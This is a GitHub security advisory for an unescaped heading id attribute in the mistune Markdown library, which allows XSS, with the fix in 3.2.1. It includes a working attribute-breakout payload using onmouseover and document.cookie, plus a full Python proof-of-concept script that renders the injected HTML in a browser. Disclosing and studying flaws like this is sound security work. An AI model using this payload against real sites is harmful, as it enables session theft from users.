Skip to content

Mistune Heading ID Attribute has Injection XSS

Moderate severity GitHub Reviewed Published May 6, 2026 in lepture/mistune • Updated May 9, 2026

Package

pip mistune (pip)

Affected versions

<= 3.2.0

Patched versions

3.2.1

Description

Summary

HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML — with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.

The default TOC hook assigns safe auto-incremented IDs (toc_1, toc_2, …) that never contain user text. However, the add_toc_hook() API accepts a caller-supplied heading_id callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like #installation or #getting-started — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.

Details

File: src/mistune/renderers/html.py

def heading(self, text: str, level: int, **attrs: Any) -> str:
    tag = "h" + str(level)
    html = "<" + tag
    _id = attrs.get("id")
    if _id:
        html += ' id="' + _id + '"'    # ← _id is never escaped
    return html + ">" + text + "</" + tag + ">\n"

The text body (line content) is escaped upstream by the inline token renderer, which is why text arrives as &quot; etc. But _id arrives as a raw string directly from whatever the heading_id callback returned — no escaping occurs at any point in the pipeline.

PoC

Step 1 — Establish the baseline (safe default IDs)

The script creates a parser with escape=True and the default add_toc_hook() (no custom heading_id callback). The default hook generates sequential numeric IDs:

md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)          # default: heading_id produces toc_1, toc_2, …

bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)

Output — ID is auto-generated, no user text appears in it:

<h2 id="toc_1">Introduction</h2>

Step 2 — Add the realistic trigger: a text-based heading_id callback

Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, mkdocs, sphinx, jekyll all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation:

def raw_id(token, index):
    return token.get("text", "")   # returns raw heading text as the ID

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

Step 3 — Craft the exploit payload

Construct a heading whose text contains a double-quote followed by an injected attribute:

## foo" onmouseover="alert(document.cookie)" x="

When raw_id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This is passed verbatim to heading() as the id attribute value.

Step 4 — Observe attribute breakout in the output

ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)

Actual output:

<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>

Note: the heading body text is correctly escaped (&quot;), but the id= attribute is not. A user who moves their mouse over the heading triggers alert(document.cookie). Any JavaScript payload can be substituted.

Script

A verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser.

#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook

def raw_id(token, index):
    return token.get("text", "")

# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)

bl_file = "baseline_h2.md"
bl_src  = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)

print(f"[{bl_file}]\n{bl_src}")
print("[output — id=toc_1, no user content, safe]")
print(bl_out)

# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)

ex_file = "exploit_h2.md"
ex_src  = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)

print(f"[{ex_file}]\n{ex_src}")
print("[output — heading_id returns raw text, id= not escaped]")
print(ex_out)

# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit  .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""

def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
  <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'}{h.escape(label)}</div>
  <div class="panels">
    <div class="panel">
      <h3>Input — {h.escape(filename)}</h3>
      <pre>{h.escape(src)}</pre>
    </div>
    <div class="panel">
      <h3>Output — HTML source</h3>
      <pre>{h.escape(out)}</pre>
      <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
      <div class="rendered">{out}</div>
    </div>
  </div>
</div>"""

page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping.
Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit",  "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""

out_path = os.path.join(os.getcwd(), "report_h2.html")
with open(out_path, "w") as f:
    f.write(page)
print(f"\n[report] {out_path}")

Example Usage:

python poc.py

Once the script is run, open report_h2.html in the browser and observe the behaviour.

Impact

Dimension Assessment
Confidentiality Session cookie / auth token theft via JavaScript execution triggered on mouse interaction
Integrity DOM manipulation, phishing content injection, forced navigation
Availability Page freeze or crash available to attacker

Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's heading_id callback without independently sanitising the returned value.

References

@lepture lepture published to lepture/mistune May 6, 2026
Published to the GitHub Advisory Database May 9, 2026
Reviewed May 9, 2026
Last updated May 9, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS score

Weaknesses

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. Learn more on MITRE.

CVE ID

CVE-2026-44897

GHSA ID

GHSA-v87v-83h2-53w7

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.